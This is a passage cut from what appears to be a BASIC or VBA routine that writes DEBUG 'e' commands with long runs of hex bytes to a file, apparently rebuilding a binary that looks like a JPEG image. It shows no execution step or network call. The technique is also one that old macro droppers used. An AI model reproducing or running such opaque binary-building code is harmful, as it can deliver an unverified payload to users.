37 1B B1 BB 50 A8 A5 45 00 94" Print #1, "e 0B30 A4 FB 52 EE CF 16 BB 15 93 CD B3 4A C7 BD 9A 5B" Print #1, "e 0B40 D6 AB 87 B2 A0 28 8E B1 55 DD 75 A4 A2 95 63 7A" Print #1, "e 0B50 97 F3 52 A8 AB B4 32 D6 3B 6D 5D 16 3B DA D5 45" Print #1, "e 0B60 15 8A BD BC 51 BB F0 82 78 23 2B 08 61 61 42 C3" Print #1, "e 0B70 F7 76 26 D1 AB DA 34 36 E8 7F C3 A5 4A F4 54 FF" Print #1, "e 0B80 00 26 D2 EB DB A5 56 F1 58 A4 56 BC 11 98 B8 8B" Print #1, "e 0B90 A3 4A 56 67 E1 A3 80 AC 2A C6 AA 65 61 AF 21 BA" Print #1, "e 0BA0 8E 91 61 09 76 3D 51 7C 5A 57 7D 82 FC D2 02 A5" Print #1, "e 0BB0 E2 F3 AC AC 6B 4D E0 60 1E 53 30 70 95 86 AC DC" Print #1, "e 0BC0 71 38 78 E4 C2 6E 3A C4 6F 8D DA FE 37 50 D9 BD" Print #1, "e 0BD0 56 4A 96 2B D4 44 17 FB A0 D5 67 E6 DB 31 E5 97" Print #1, "e 0BE0 B6 09 82 6E F3 46 79 FB 4C 87 77 49 2D 1A 11 2A" Print #1, "e 0BF0 28 5F 8F F4 AF D9 57 16 55 01 FB 58 64 54 EF D5" Print #1, "e 0C00 41 7D 4A 75 42 C8 18 FC 88 E6 FC 5D EE 0E A9 FE" Print #1, "e 0C10 B3 F8 F5 DF A5 75 DF DB A5 C6 8F 4C 15 85 C5 AE" Print #1, "e 0C20 2B 1A CE 0A 44 25 01 8C 4D 17 0D A6 E3 2E AB 7B" Print #1, "e 0C30 BA 29 A8 E1 72 66 4A ED 6C 89 FE C7 DE CA B9 BC" Print #1, "e 0C40 D0 B6 36 B3 47 FF 00 A7 15 03 8C 7B CD A6 66 27" Print #1, "e 0C50 7E B2 74 DC 81 BA D2 F2 4A 0E 8B 97 17 A3 97 0C" Print #1, "e 0C60 F4 B7 11 94 44 56 24 33 96 C5 97 7F 29 43 71 78" Print #1, "e 0C70 59 4C A2 D3 F2 C6 18 10 5C E5 B4 5E 47 09 79 77" Print #1, "e 0C80 11 66 F6 95 DC 0F 8C 13 95 7B C1 DE AF 9D 8C 03" Print #1, "e 0C90 28 4C 29 F5 2E EE F6 84 D9 DC F6 61 7B 7F AC FC" Print #1, "e 0CA0 7A 47 D7 7F 8B 98 3B 0A FC 95 8D 06 78 EE 3A B2" Print #1, "e 0CB0 86 BF 71 BB 23 D5 0E 8B F7 BE 32 F5 C5 41 D7 86" Print #1, "e 0CC0 AE B5 BA 28 BD 58 0E 6B C8 03 5C C2 C7 E4 CC E5" Print #1, "e 0CD0 F6 EA E2 90 C6 CE 79 38 59 1E 43 8B 1A 9B EF 4E" Print #1, "e 0CE0 AE 2D CF A0 85 AA D5 4F DD D8 CB 59 3D 64 AD 57" Print #1, "e 0CF0 12 E7 9A 8B 99 AE 13 01 C1 4B C4 B4 A2 8C C7 05" Print #1, "e 0D00 D2 34 B7 E6 B3 0B 46 C6 A8 49 00 1A D4 31 86 DB" Print #1, "e 0D10 90 67 19 AA E3 B7 1F F6 FC 4C F5 B7 F4 FD DC C9" Print #1, "e 0D20 C1 C8 C6 E8 17 74 7D C2 69 39 9D BB AC CB A9 E7" Print #1, "e 0D30 DC AC EA DB CC E5 5E 55 D5 56 A5 5B 0E AA B1 8C" Print #1, "e 0D40 D5 2D 93 CA A2 9C A8 A1 FC 8B 8E 2A 69 B7 EA 1F" Print #1, "e 0D50 4E F3 79 77 32 14 BA 52 91 BA 0D 0C 9D 8B 94 17" Print #1, "e 0D60 55 A6 62 13 D8 7A 4A 49 79 FA 73 71 8C 44 AA E9" Print #1, "e 0D70 04 DB C6 D1 1A CA C7 D1 90 A9 AB 28 16 B3 55 77" Print #1, "e 0D80 30 00 32 1F 9D 8C 58 D8 17 14 02 B0 D4 30 C7 29" Print #1, "e 0D90 26 A1 25 32 B8 11 B7 68 F6 7B 99 D6 FA 73 C9 20" Print #1, "e 0DA0 EC FB 31 BD A1 15 ED 43 C7 1B 19 F6 33 CE 96 45" Print #1, "e 0DB0 96 EA 01 ED 2F 1C 13 65 76 40 C6 DA CC 88 95 33" Print #1, "e 0DC0 FB 6D D3 74 66 BD CC 1C 90 A5 61 E5 DB B1 F5 1D" Print #1, "e 0DD0 39 0C 7B 10 C4 5F D3 DC 95 47 28 54 BA D9 71 9D" Print #1, "e 0DE0 B9 8B 85 90 E9 90 A6 26 E7 1A E2 0B AB 82 05 76" Print #1, "e 0DF0 95 18 DE 40 6F 4C C7 B5 05 FD 9B F4 32 F7 9A 71" Print #1, "e 0E00 77 C1 57 C2 7C 4A 5A F7 84 B0 A9 87 C1 44 39 09" Print #1, "e 0E10 8C EC 3E 8F 08 71 DA 86 E3 D5 77 42 3B 33 84 CF" Print #1, "e 0E20 CA B7 5F 3F 96 93 93 43 7F A8 5F 57 57 37 99 17" Print #1, "e 0E30 42 9C 67 F7 70 DC 42 44 DA DD AC 51 9B 2F 4E 6B" Print #1, "e 0E40 04 11 95 8F 07 25 E1 7E 5D EC 59 21 74 BE 50 7D" Print #1, "e 0E50 AD 8D AA 98 B9 7C 54 9C 9C 1E 56 CC AB 5A 19 91" Print #1, "e 0E60 6F CC E4 53 27 32 94 FD 53 20 F9 89 37 0B 23 93" Print #1, "e 0E70 32 8B 10 B2 92 E3 CE 00 C3 20 C9 15 35 38 AE 5D" Print #1, "e 0E80 32 E5 7C A1 2C 26 36 01 6D 81 40 B4 6A 4B 5E 45" Print #1, "e 0E90 E6 61 12 0F B5 70 55 50 5C 0B AE EF 2B C0 B9 A9" Print #1, "e 0EA0 60 E5 BD 99 18 8E 44 DB D7 52 FA 97 B5 4C 17 76" Print #1, "e 0EB0 1E EC 85 B2 C4 F6 82 D9 55 57 32 DB B3 07 28 A0" Print #1, "e 0EC0 DB 48 F4 BC 94 21 37 58 AF B6 2C EA 64 91 54 BF" Print #1, "e 0ED0 79 B7 C7 15 E4 45 93 7B DD C5 64 24 98 D6 6C 9C" Print #1, "e 0EE0 07 96 2B F2 0B 62 F2 26 23 C7 7B 21 31 CB 49 C3" Print #1, "e 0EF0 1B DF C5 B8 58 96 2A E5 43 57 91 F2 3B 51 0E 12" Print #1, "e 0F00 73 91 4F CB A1 0C 1D 95 0F 28 95 9F FB 82 9A 2D" Print #1, "e 0F10 6A F2 33 BC 6C A6 8B 30 0D C0 38 2A 9C 31 16 2D" Print #1, "e 0F20 1C 2D CB 27 91 93 45 61 7E C6 B8 95 AE EB 21 AE" Print #1, "e 0F30 51 AF 35 B5 3F 71 76 F8 ED 7E 60 34 38 C6 1D D4" Print #1, "e 0F40 E5 77 34 AA ED C1 60 01 DE 55 DD F9 57 C1 8C 06" Print #1, "e 0F50 05 62 61 6D 7A 76 1B 21 E8 E8 D9 9A 33 36 7A 19" Print #1, "e 0F60 8E 5B CE 55 2C 86 6F 53 90 C2 BD E6 DD 06 F8 DA" Print #1, "e 0F70 9A 2C 10 B9 96 D3 DC 17 7C 68 1A 32 95 92 C9 D8" Print #1, "e 0F80 7C ED B3 1C D7 94 16 19 8C A2 67 28 C9 8D 74 04" Print #1, "e 0F90 EB DE EE 65 12 71 8B 1D 97 92 BC 9D 24 2C BB A2" Print #1, "e 0FA0 15 77 BC AB DA 06 49 8D 16 49 94 16 ED 7F B8 F1" Print #1, "e 0FB0 99 39 ED 6C FA 76 18 F8 DE 4B B1 B4 BA 95 89 92" Print #1, "e 0FC0 03 8C A7 F2 CA 75 96 4A C4 39 EF D9 3E 56 50 B2" Print #1, "e 0FD0 8D 65 9D 96 05 3B 85 C8 5E 5B F7 B7 1A 6C 36 7C" Print #1, "e 0FE0 72 3F 3C A0 B2 EA 77 2A 5D 85 CF A5 3C 9E 23 79" Print #1, "e 0FF0 25 71 85 BD A1 7D D3 DE 85 64 7B C4 D7 22 BA F6" Print #1, "e 1000 36 6D 3F FA 72 DA 94 5B 97 3B DD 80 0D 56 A5 89" Print #1, "e 1010 E2 BB EC 0D DD 5A 1D 65 0E B9 52 59 DC 8C C5 2B" Print #1, "e 1020 89 D3 B2 59 69 D1 78 8E 7E 21 25 D9 3C 56 16 5B" Print #1, "e 1030 D8 56 D3 24 08 2E AE 72 95 C6 E6 6E 37 66 B1 75" Print #1, "e 1040 16 8D 92 32 5A CD 4F 19 6D 59 7D 33 E5 39 4E 70" Print #1, "e 1050 8E 15 D9 5E DE FC 6F 6C 12 C4 4C 6E 60 50 BF 37" Print #1, "e 1060 8E 49 36 D9 32 07 9A B1 32 B8 CB AE 54 1B 8D EA" Print #1, "e 1070 2F D9 72 AA CA 0A D6 35 CF 18 65 5F 32 E5 1B F9" Print #1, "e 1080 9B CA 79 F0 DE A7 21 AA DF AE 11 71 94 B5 92 D8" Print #1, "e 1090 4C C5 0C 4D 41 ED 35 B5 4F 3A 13 51 41 F7 BE 7B" Print #1, "e 10A0 45 BF 7A 1F 94 CF 01 C9 C4 BF 6F B3 88 5B 34 86" Print #1, "e 10B0 A0 D9 28 EB 2E 79 A7 3F 70 6C 66 43 DB 7F 22 BA" Print #1, "e 10C0 AD A0 57 22 CD 58 B3 4D AB EB 93 9F 8E F4 B1 60" Print #1, "e 10D0 23 83 AB 64 AE AF 5D 78 5B 73 01 8D E5 C6 AC C6" Print #1, "e 10E0 72 95 02 FD B1 71 43 8D 76 DB 8A 2A 33 85 8B CF" Print #1, "e 10F0 1B E3 50 3D E6 F3 21 5C C7 03 27 DB 61 2A CC 47" Print #1, "e 1100 16 73 54 37 95 8D F5 DE 6F E8 DF D3 8D 5B 9D DD" Print #1, "e 1110 CC B6 F2 98 1F D9 94 DE 39 75 AB 2D CD CC FA 46" Print #1, "e 1120 2C DE 0D EF 77 91 40 4E CB 33 26 64 B2 EB D6 5B" Print #1, "e 1130 74 AB DA E9 95 75 77 2E 55 CE 55 2C AA 59 4D E0" Print #1, "e 1140 B3 8C 3C AB EC 75 EC 55 33 C3 B6 61 DE 86 DE C3" Print #1, "e 1150 00 96 77 5B 57 B6 DB 54 D8 2A 5D D4 C7 55 31 97" Print #1, "e 1160 C1 2E 17 A4 66 A4 D0 74 B7 F1 42 8A A7 8E 25 3E" Print #1, "e 1170 AA E2 CE 8E 36 B8 B8 B3 3C 2C 43 3B 61 4D FD 35" Print #1, "e 1180 B1 C3 5D 8F AF 17 16 88 6D 9B C7 33 88 95 EF 7A" Print #1, "e 1190 67 F7 E4 7F 7A BF 9D DD 77 EC FB B2 99 76 2E 6D" Print #1, "e 11A0 9C AD CA BD 74 CE 45 9B A9 37 25 7D 2A 72 9B CD" Print #1, "e 11B0 E5 14 E5 2E E7 2D A7 28 57 BF A2 EB 81 2C C4 26" Print #1, "e 11C0 99 A8 B4 13 A8 A3 BC 24 65 C6 F7 AA B9 41 52 8A" Print #1, "e 11D0 F7 D2 D3 62 5A AE 39 84 D2 5B F2 D5 B1 EF B3 57" Print #1, "e 11E0 B4 5F 65 D0 94 C5 15 3C A1 BA A1 7C C7 95 ED F6" Print #1, "e 11F0 01 B7 53 B6 B6 46 2C 83 D1 8F 5F 3E D8 F6 CC BD" Print #1, "e 1200 DC 7C BA 09 58 CB F7 81 7B 17 F2 25 15 47 38 CF" Print #1, "e 1210 A5 6F C7 EE 6D E8 1A B2 BF F6 61 24 0A 17 E6 7F" Print #1, "e 1220 95 53 55 62 9E 51 2C 35 12 09 BC 5D 91 4D 56 4A" Print #1, "e 1230 C4 83 1E 80 A1 2E C6 62 F7 49 89 53 E8 D5 82 60" Print #1, "e 1240 19 9A 58 2E CD 8E CE 82 B2 E7 DA DA 05 D6 DE 28" Print #1, "e 1250 32 BB 19 0B 8E 56 DE 81 85 5D 6E 5E DD 2A F6 80" Print #1, "e 1260 DF 62 01 29 75 B5 E3 E3 13 27 0A 12 3C FB 15 91" Print #1, "e 1270 D9 DD FA 2A 07 6C 05 AF 61 CD BA 7B ED F7 06 E5" Print #1, "e 1280 D7 51 F8 D7 4E 57 B7 4D FE 33 38 58 B0 A8 91 26" Print #1, "e 1290 5F 8E F0 6B F1 D2 CA D3 F3 F1 C7 4F 03 E2 FC AC" Print #1, "e 12A0 B5 3D 78 0E 4E 34 5B 81 EB D4 75 10 C4 4E 66 A3" Print #1, "e 12B0 91 93 78 8F ED 5B 15 BC 12 DA 5D 63 1D F8 CB 82" Print #1, "e 12C0 43 53 30 7E 97 A0 6E 10 7B 74 01 E5 E8 12 DA D4" Print #1, "e 12D0 EC 3B 17 66 A7 83 1C 47 06 B7 9D BB E3 E8 57 F6" Print #1, "e 12E0 78 F4 51 B5 43 2E 00 59 93 AA 96 BF BB 57 3D 8A" Print #1, "e 12F0 10 D8 CF CC DA 50 59 5D D6 DE 97 B0 CC F1 B0 9F" Print #1, "e 1300 92 21 87 92 B2 7A B3 29 39 39 79 8C 0D 3F 08 90" Print #1, "e 1310 14 DA E5 6E 12 2A C9 10 24 E4 E4 58 21 3E FE 0E" Print #1, "e 1320 42 2D 58 88 60 0A 8D 56 05 45 09 22 53 B3 61 7B" Print #1, "e 1330 0D CD 42 F6 4F 54 28 DE C6 E9 99 2A 00 38 CF 45" Print #1, "e 1340 DD 97 A5 61 67 60 BA 1A 0D A6 4A A9 4C F4 29 3C" Print #1, "e 1350 87 E4 54 38 D7 36 15 0B AF 72 BF 6E 95 28 6A 76" Print #1, "e 1360 8A 5D 6D F6 84 F6 98 61 84 D9 8F 87 A4 54 69 69" Print #1, "e 1370 6A 56 65 AA DD E8 BA A9 FA 7B FF 00 1B B2 C1 06" Print #1, "e 1380 9C C5 BC B5 15 55 4C C2 67 64 31 B2 1A 25 8E C1" Print #1, "e 1390 98 58 F6 EC A7 29 69 C2 C3 5D FE E1 A9 D7 D1 48" Print #1, "e 13A0 B9 74 2E 5B 2C 86 5F 21 1E F0 DD D0 59 4C CC 52" Print #1, "e 13B0 34 B3 19 C1 2E A2 90 C7 5E 9C 86 2B 50 D4 FF 00" Print #1, "e 13C0 A7 FD DF A3 5E C6 87 4B AD BA E3 E3 1B A0 24 54" Print #1, "e 13D0 2C D8 6C DB B4 2B DF D2 AC 76 14 48 8D 8B AA 86" Print #1, "e 13E0 30 6F 7B 1F 93 7F 32 86 55 4A DE 16 FF 00 73 79" Print #1, "e 13F0 BF AF F4 FD 7F C7 99 8C C7 B7 07 4F EC 37 54 65" Print #1, "e 1400 52 74 EC 50 A5 E4 6A 0B 59 98 2F 29 58 27 E3 9B" Print #1, "e 1410 19 4B 00 6F 7B 50 CA AA E0 8C BF 22 6A 2B A1 2C" Print #1, "e 1420 5F 6C 72 CF 12 6E 6A 44 C3 01 A1 DA CA D4 81 47" Print #1, "e 1430 F1 C9 40 E1 D6 56 73 1A BC 44 23 29 19 87 A9 FF" Print #1, "e 1440 00 47 AB BD 76 38 E4 8D F9 60 04 6E 75 42 C9 3B" Print #1, "e 1450 84 76 5E BC 20 E4 35 4B 09 C9 65 19 45 75 91 56" Print #1, "e 1460 30 EF 79 B4 A8 24 35 74 D0 86 43 72 A9 73 8A EE" Print #1, "e 1470 F8 04 20 1D BD 23 8A F2 AB C6 75 4B 1B A9 7B 7A" Print #1, "e 1480 FF 00 4F 7F E2 C9 CC B4 B0 F5 3B DB 2F 20 8C 94" Print #1, "e 1490 5F F2 A9 6B 66 5A 69 22 2F BD B5 0C DF 7C 7C 0A" Print #1, "e 14A0 BA CF D5 3F F3 E9 A2 3D AD 50 7E 9D 7F 4F 3C 19" Print #1, "e 14B0 79 18 F6 BC 1C 51 74 61 E1 E3 DE 39 D3 87 03 61" Print #1, "e 14C0 CB D6 2A EC 74 21 BB D4 35 3A D9 17 F9 EB 5F 9F" Print #1, "e 14D0 05 4D 17 25 89 2F B6 86 14 C7 A0 06 53 2A 51 54" Print #1, "e 14E0 CF 52 F8 1D FB ED 7C 7A 0D 55 C0 45 9C C7 D3 9A" Print #1, "e 14F0 C3 3D 18 86 0E 95 BC 3D 21 B5 46 87 28 D7 80 F3" Print #1, "e 1500 8B D2 4A E2 F4 C4 0C 4A 12 BA AD A1 7B C3 AD E1" Print #1, "e 1510 63 AC E7 84 AB 85 A7 AA 7E DC 10 B0 65 E1 1C 0D" Print #1, "e 1520 11 3B 27 18 31 43 52 1F AF 87 A6 63 B5 1F B5 E1" Print #1, "e 1530 C2 58 E3 91 61 24 ED ED 5E 3A 8D C4 39 C4 02 E5" Print #1, "e 1540 52 81 59 FA 9D 6E 9D 2E 6A BF D7 88 CF A5 5A 7A" Print #1, "e 1550 AD 9A 93 D2 A5 E9 59 14 4B 66 9E B7 31 44 BB 16" Print #1, "e 1560 32 F1 B2 48 17 96 B4 A7 1F 0A 6A 7F D3 E8 BA DA" Print #1, "e 1570 03 08 22 F3 FE 24 9C 67 46 E1 38 3E D6 32 58 C3" Print #1, "e 1580 0C 7B 8B 0D A1 7B 4D 61 A5 67 71 5C B9 2F 4D EE" Print #1, "e 1590 05 69 89 0B C5 56 9E 92 1C 84 DD 5B 2A A7 F3 A1" Print #1, "e 15A0 B0 18 E6 50 55 BC 5B 77 47 72 88 D7 29 BC AF C9" Print #1, "e 15B0 00 97 A8 2B 6B CD 02 BB CC AD 94 CA 3B EF 71 BA" Print #1, "e 15C0 6C EE 4A 3A 96 71 6C BE D3 F8 B0 86 96 25 DE 29" Print #1, "e 15D0 DE 29 6E BE 34 00 50 40 17 35 55 8B 96 1C D5 06" Print #1, "e 15E0 CE D8 0B DE 00 57 1A 50 4B 1A DB B7 51 A9 02 AA" Print #1, "e 15F0 40 8D B4 99 03 90 D3 2A CA 29 86 A8 4C 32 36 31" Print #1, "e 1600 97 5C 65 D7 4D A2 68 39 ED D3 78 B7 18 4F 27 BB" Print #1, "e 1610 32 44 6A FD 2B 1E 66 8C 05 04 0D AA 87 DF A1 5E" Print #1, "e 1620 F3 51 1E 4A A1 DE 5D EF 28 AE A5 99 5C 58 F2 2A" Print #1, "e 1630 FA 73 19 B7 71 CC B0 06 E6 30 66 02 8B 51 C8 C5" Print #1, "e 1640 C1 42 04 B7 8D 18 CA 8C AA 84 A0 B8 78 4A BA 6E" Print #1, "e 1650 27 19 6A 10 0C 61 5D D3 AE B7 22 95 77 BF 2B 9F" Print #1, "e 1660 FF C4 00 25 11 00 02 02 01 04 02 02 03 01 01 00" Print #1, "e 1670 00 00 00 00 00 00 01 02 11 12 03 10 21 31 13 20" Print #1, "e 1680 41 51 22 30 61 32 04 FF DA 00 08 01 03 01 01 3F" Print #1, "e 1690 01 16 D4 8E CC 4B 92 2E 4C FC 8F C8 D3 76 C9 35" Print #1, "e 16A0 65 A2 D1 68 C9 16 64 64 64 64 64 64 5A 2D 16 59" Print #1, "e 16B0 7B 59 65 97 E8 95 97 F5 BD 14 CC 07 1C 47 24 28" Print #1, "e 16C0 59 05 52 25 DE EA 0D 9E 33 C6 8F 1F D1 83 29 8D" Print #1, "e 16D0 14 62 CA 65 15 E9 89 8B 31 DD 6D 0D 36 F8 43 D3" Print #1, "e 16E0 69 91 4B A1 E9 89 14 48 75 5B 24 C8 DD DB 1F 7B" Print #1, "e 16F0 23 A1 B6 36 C8 59 5C 12 F7 92 21 1C 98 B4 E2 8E" Print #1, "e 1700 06 C4 CC 54 89 2A 23 B2 FE 0D B9 76 60 DF 42 52" Print #1, "e 1710 5C 12 BF 82 39 BE CA A3 57 EB 6C B6 B6 29 72 74" Print #1, "e 1720 66 84 D3 1D 16 8B 1A B1 FB C6 0E 12 1C A5 F0 2F" Print #1, "e 1730 E9 6A 5F E4 A6 5C 57 64 A1 97 23 D3 82 8F F7 68" Print #1, "e 1740 C8 86 D5 2F A3 2A F8 14 C7 3A 5C 9A 93 CB D3 1D" Print #1, "e 1750 A3 25 21 E9 A6 3D 3C 55 8E 0D AB 3C 46 0A 24 9C" Print #1, "e 1760 56 F7 E9 26 43 53 28 F2 26 98 E9 22 A3 DA 1B 4F" Print #1, "e 1770 86 62 91 64 E4 9F 5B 78 A3 DA E8 D2 9D 7E 2C 64" Print #1, "e 1780 5D 19 13 D5 1C EF 69 3A 32 A3 29 33 F2 39 34 BF" Print #1, "e 1790 C8 B5 0C DF D9 1D 47 F2 C9 6A 2F 83 56 77 C1 5B" Print #1, "e 17A0 65 2F B3 CB 24 43 57 23 23 21 ED 09 8A AC 73 A1" Print #1, "e 17B0 BB DA 6B 82 CB 14 D9 CF 64 75 7E CF 31 2D 4B 2E" Print #1, "e 17C0 B9 30 57 63 3F 8C 6A B8 22 A9 6E B8 2C CC 72 BD" Print #1, "e 17D0 A5 D9 F0 38 D8 D1 44 74 DF AA 74 C7 4C A3 1F 65" Print #1, "e 17E0 B7 03 6A 29 9A B2 7A 9C B1 6D 42 FD 12 62 43 D9" Print #1, "e 17F0 A1 2F 78 B6 64 66 CC 89 5D 6D 45 56 D6 5E DD 8D" Print #1, "e 1800 D1 65 91 77 EF 6C AF BF 45 B2 F6 4E 8E C5 C1 43" Print #1, "e 1810 DE 69 C4 C9 89 DE F6 3B 5B C3 AD AC BF 5B B1 6F" Print #1, "e 1820 27 45 D8 BF 46 46 43 77 BE A3 B4 43 27 D0 D3 86" Print #1, "e 1830 ED 0D 56 D5 B7 F0 AD DB AD B1 F5 5A 0E 7C D8 BF" Print #1, "e 1840 E5 89 2D 38 C7 AF 4B 3B 30 67 8C F1 A3 C4 78 59" Print #1, "e 1850 E2 91 E3 97 D1 28 E4 A9 10 83 89 28 64 78 99 2D" Print #1, "e 1860 3F A3 C4 C7 A5 63 D1 FA 3C 26 0C C4 C5 FA 51 CF" Print #1, "e 1870 A4 74 DC 88 C3 1D B5 51 45 18 98 98 51 06 52 1A" Print #1, "e 1880 FA 2D A3 33 22 CF FF C4 00 26 11 00 02 02 01 04" Print #1, "e 1890 02 02 02 03 01 00 00 00 00 00 00 00 01 02 11 12" Print #1, "e 18A0 03 10 21 31 13 20 41 51 04 14 22 30 32 61 FF DA" Print #1, "e 18B0 00 08 01 02 01 01 3F 01 C5 94 51 C9 D1 91 49 95" Print #1, "e 18C0 5E 98 B3 06 60 CC 19 83 31 66 26 26 06 06 26 26" Print #1, "e 18D0 2C C5 98 B3 16 62 CC 59 81 81 80 E3 B7 C6 CD FB" Print #1, "e 18E0 59 17 65 0F 65 BB 92 46 66 66 65 AD AF 6B 2C BF" Print #1, "e 18F0 5B 32 2F 66 86 AB 69 4D 19 21 CF 93 31 8C E6 88" Print #1, "e 1900 A6 9E CF D5 F2 21 51 21 31 0B DA 2C 93 A1 EA 32" Print #1, "e 1910 D8 AF 68 EA 57 62 76 4B 6A B1 89 EC 9F D8 E9 74" Print #1, "e 1920 64 8D 3E 59 46 25 14 63 B6 2C A6 2B 29 94 27 42" Print #1, "e 1930 F7 94 93 42 8C 47 14 85 1F B2 A2 38 DF 44 25 5C" Print #1, "e 1940 19 3C B6 68 6A 9D 08 E0 A3 13 1B 21 1C 4A F4 A1" Print #1, "e 1950 C5 A1 4C F2 5B A2 3A 8A E8 CC C9 B1 5F BA 25 1E" Print #1, "e 1960 46 A8 4A CE 7A 65 34 2E 44 84 B6 EC D4 8F C9 46" Print #1, "e 1970 27 24 60 D8 A3 5B 2D EF 69 76 38 18 AF A1 C1 7C" Print #1, "e 1980 22 30 FB 23 1D E8 C5 0E 25 15 BC A2 7C 14 2E C4" Print #1, "e 1990 88 F6 62 8C 76 BE 28 94 17 C1 80 A2 28 FD 19 36" Print #1, "e 19A0 BD 3B 2B 67 B5 15 B4 21 68 A4 E7 43 55 BB F5 6A" Print #1, "e 19B0 C5 C7 A5 3F 47 BC 55 B3 4A 5C 52 1F BA 66 17 FE" Print #1, "e 19C0 46 AB 6D 3D 3B E5 92 74 88 4A 9D 89 F2 58 DF AD" Print #1, "e 19D0 6C CA 28 A1 6E F7 AE 47 DD 94 97 27 7B BF 54 CC" Print #1, "e 19E0 EF 86 28 45 72 D9 E4 F8 89 3B F9 DD FF 00 4F 5B" Print #1, "e 19F0 5F A6 A4 F1 8D A3 F6 75 3E 8D 2D 7C CC 91 AB AE" Print #1, "e 1A00 A0 4B F2 25 68 8C D3 43 69 76 27 63 9C 6F B2 CD" Print #1, "e 1A10 5D 77 19 54 7D 52 6F A2 30 C4 D4 6A BF B5 C6 CF" Print #1, "e 1A20 15 FC 8B 8D FF 00 23 FC 11 CA A9 12 8B D3 88 E0" Print #1, "e 1A30 94 72 1F 3C 92 54 D5 0D 63 2E 07 2C DF F2 34 DB" Print #1, "e 1A40 5C 5D 0D 2A B4 4A 4E 55 13 52 0A 13 A5 BA 83 97" Print #1, "e 1A50 46 4D 1E 57 F0 39 B7 E9 2D 4A 1E BB 21 37 2D AF" Print #1, "e 1A60 76 64 8F 21 E4 67 90 F2 23 34 66 89 DC 95 10 4D" Print #1, "e 1A70 12 59 23 C4 FA 6C 96 8E 4B 83 C1 2E C9 69 B6 EC" Print #1, "e 1A80 F1 BE E2 47 41 63 4F B3 F5 A6 D5 58 FF 00 19 D7" Print #1, "e 1A90 FD 3F 5A 57 6D EF D7 28 CE FF 00 D1 8C 5F 43 55" Print #1, "e 1AA0 C6 EE 54 4A 57 B6 99 65 EF 99 26 58 A8 4A CC 0C" Print #1, "e 1AB0 4C 4F FF C4 00 3D 10 00 01 03 02 03 05 04 08 04" Print #1, "e 1AC0 05 04 03 00 00 00 00 01 00 02 11 03 21 12 22 31" Print #1, "e 1AD0 10 32 41 51 61 13 20 71 81 04 23 30 33 42 52 72" Print #1, "e 1AE0 91 14 40 62 A1 82 B1 C1 D1 E1 05 24 92 A2 50 73" Print #1, "e 1AF0 F0 FF DA 00 08 01 01 00 06 3F 02 DB 80 EC C2 C3" Print #1, "e 1B00 6E 2E 45 B3 65 2F 74 AD EF 2D 93 2B 8A DE 2B 05" Print #1, "e 1B10 57 19 2B 7C AD F5 38 8A DE 2B 78 AD E2 B7 90 FF" Print #1, "e 1B20 00 C3 D9 C1 6A B5 59 4F 74 A3 B3 7C 2D E0 B7 93" Print #1, "e 1B30 7B 21 BB C5 67 A9 1D 02 8B 9F 35 7F D9 70 0E FB" Print #1, "e 1B40 94 5D 9B 0A C6 F2 ED 62 79 FF 00 95 95 87 A2 31" Print #1, "e 1B50 98 E8 86 43 27 40 AF 64 01 3F 75 A2 D0 4A 9C 2B" Print #1, "e 1B60 71 5D 9B 02 85 A2 D1 6E AD 16 8B 45 A7 7F 55 AF" Print #1, "e 1B70 73 5E EE 8B 45 A2 DD 5A 2D 16 8B 4D 93 78 40 45" Print #1, "e 1B80 CA 89 90 B5 28 E6 24 72 2B 0B 4A DF 9F 25 18 DA" Print #1, "e 1B90 7C 94 4A F5 80 8B 69 CD 6B 1E 2B 79 B7 EB DF 96" Print #1, "e 1BA0 A8 C5 3B 75 80 B0 B7 D6 3B 89 E0 14 D4 AB 11 C9" Print #1, "e 1BB0 61 A4 D2 E6 9D 42 32 EC ED E0 16 31 0E 70 E6 B1" Print #1, "e 1BC0 3F 33 CF D8 2F 5A CC 4E 07 2B 41 86 B4 23 55 B0" Print #1, "e 1BD0 1A 2D 27 8F 80 57 C5 87 A8 44 36 4F 92 89 70 E8" Print #1, "e 1BE0 A1 D6 78 DA 3D 9E E9 5B A7 F2 B2 C6 E1 F3 5C 55" Print #1, "e 1BF0 9B 0E FD B6 1B 4C 2D 60 75 58 42 BE BA 5D 13 18" Print #1, "e 1C00 58 2F 88 AB 2D E3 28 10 21 C2 E1 62 AA F3 8F 9E" Print #1, "e 1C10 AA 26 59 CD 65 33 DC 92 AE 55 B6 44 66 D9 CD 05" Print #1, "e 1C20 0D 37 56 99 54 D8 37 9C 56 1A D7 08 8A 4C 5A B8" Print #1, "e 1C30 06 F2 10 8C CC ED 0E 6E BB 33 21 DE D1 68 B9 95" Print #1, "e 1C40 BB B3 8A E3 B3 75 59 5F DA 68 B4 DA 2F 2A C3 6D" Print #1, "e 1C50 C4 94 70 B0 0E 81 07 E9 3A 4A C4 5A 55 81 2B 13" Print #1, "e 1C60 58 63 44 1B 55 A7 2F 04 62 2F D3 64 8E 3C D5 94" Print #1, "e 1C70 0E E4 34 47 5D B8 58 D9 28 E2 11 C2 39 AD 36 66" Print #1, "e 1C80 72 C9 0A 11 79 02 61 63 2B F1 0F 13 25 16 D3 DE" Print #1, "e 1C90 46 A0 D4 6C 90 32 FC DC 10 68 5A AD 50 52 56 8B" Print #1, "e 1CA0 4E E5 F4 43 6D B6 DC 29 01 5C 29 6F E4 6D B2 F2" Print #1, "e 1CB0 B1 3F 5E 41 3B 18 C4 38 4F 05 18 02 07 08 B7 25" Print #1, "e 1CC0 66 F5 4D 2E 19 96 2A 22 7A 2D 36 B4 AB EC D0 22" Print #1, "e 1CD0 59 73 8F 0C 28 90 50 02 C1 61 A6 2F C4 A2 F1 48" Print #1, "e 1CE0 3A A2 CE 69 D2 F1 59 3D 26 8B CF 25 A2 CA ED 81" Print #1, "e 1CF0 B3 65 71 2B 00 9C 3C 95 82 22 35 D9 FD 11 7B A7" Print #1, "e 1D00 12 F8 95 9A 54 E9 B2 DE D2 CB 5F C8 C8 D9 31 27" Print #1, "e 1D10 64 93 01 1B CA B0 28 62 DB 88 09 56 BF 44 5F 4D" Print #1, "e 1D20 BA EA 88 22 36 05 1B 7D 25 8E D7 50 81 35 26 89" Print #1, "e 1D30 D7 9A 2D A7 B7 2B F0 9E 70 AC 3B 50 AD 48 84 24" Print #1, "e 1D40 34 79 AC D5 6F E0 A1 C2 5B CC 2B 35 66 7E 13 D5" Print #1, "e 1D50 AA 2C 56 1F 3D B2 CA 35 08 E7 85 5E 85 5F F8 A8" Print #1, "e 1D60 78 20 F5 DB BA B7 56 16 61 07 AA 83 AF 73 55 72" Print #1, "e 1D70 B2 DF 6E BB 4F E4 64 98 56 78 5E F2 